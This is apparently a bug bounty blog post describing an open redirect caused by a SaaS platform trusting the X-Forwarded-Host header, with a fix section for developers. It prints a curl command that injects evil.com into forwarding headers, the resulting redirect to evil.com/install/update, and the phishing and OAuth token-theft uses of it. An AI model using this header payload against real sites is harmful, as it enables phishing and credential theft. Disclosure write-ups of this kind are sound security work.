Sitemap
Open in app

Sign in

Medium Logo
Write

Sign in

☕ How I Redirected the Entire Startup to evil.com — With One Header

AIwolfie
2 min readJun 23, 2025

🧠 Context

There I was, sipping coffee at 3AM, pretending to be a responsible cybersecurity researcher (but actually waiting for Burp to throw me a bone).

I’m poking around a SaaS app that uses subdomains like customer1.startup.io, client456.startup.io, etc.

Then I notice… hmm… something smells like an open redirect.

I sniff harder. ☕🔍

🔍 The Magic Header: X-Forwarded-Host

Some genius dev somewhere thought:

“Let’s trust whatever hostname the user sends, what could go wrong?”

What could go wrong? EVERYTHING.

🧪 Repro: One Curl to Rule Them All

I shot this simple curl:

curl -v http://client456.startup.io \
  -H "X-Forwarded-Host: evil.com" \
  -H "X-Forwarded-For: evil.com" \
  -H "X-Forwarded-Scheme: http" \
  -H "Host: originaldomain.startup.io"

Boom 💥

HTTP/1.1 303 See Other
Location: http://evil.com/install/update

They literally redirected users to evil.com — with full respect and no questions asked.

Thanks, backend ❤️

👀 The HTML Response? Cherry on Top

<meta http-equiv="refresh" content="0;url='http://evil.com/install/update'" />
<title>Redirecting to http://evil.com/install/update</title>

Bro really served a warm HTML redirect with a side of regret.

🚨 The Impact

So what if it’s just a redirect? Here’s what can happen:

  • Phishing: Send a legit-looking reset link → steal passwords
  • OAuth redirect_uri hijack: Ever heard of token theft?
  • Session fixation tricks
  • Trust issues: Literally

All thanks to this lovely blind trust in the X-Forwarded-Host.

🧪 But Wait, There’s More™️

I tried another subdomain:

http://7821xyz.startup.io

Ran the same payload. Result?

Redirected to evil.com again.

This wasn’t a one-off bug.
The entire platform was sipping from the same poison teacup.

💡 The Fix (Dear Developers)

🛑 Stop trusting user-supplied headers unless you own the reverse proxy and you sanitize everything.

✅ Whitelist known domains.

✅ Use relative redirects like /dashboard, not full URLs.

✅ Don’t trust X-Forwarded-* unless you really, really know what you're doing.

Or just let me keep redirecting your startup to evil.com. 😇

🧾 Final Thoughts

Some bugs are loud, flashy, and need 10 hours of reverse engineering.
Others? They’re like this one.

One header. One redirect. One ruined Monday.

And that’s how I turned your SaaS platform into a free redirector for evil.com.

Cheers,
Mayank ☕ | @AIwolfie

Bug Bounty
Hacking
Website
Security
Open Redirect

--

--

AIwolfie
AIwolfie

Written by AIwolfie

55 followers
12 following

Cybersecurity enthusiast ☕ | Ethical hacker | Bug bounty hunter | Sharing insights on vulnerabilities to help make the web a safer place.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech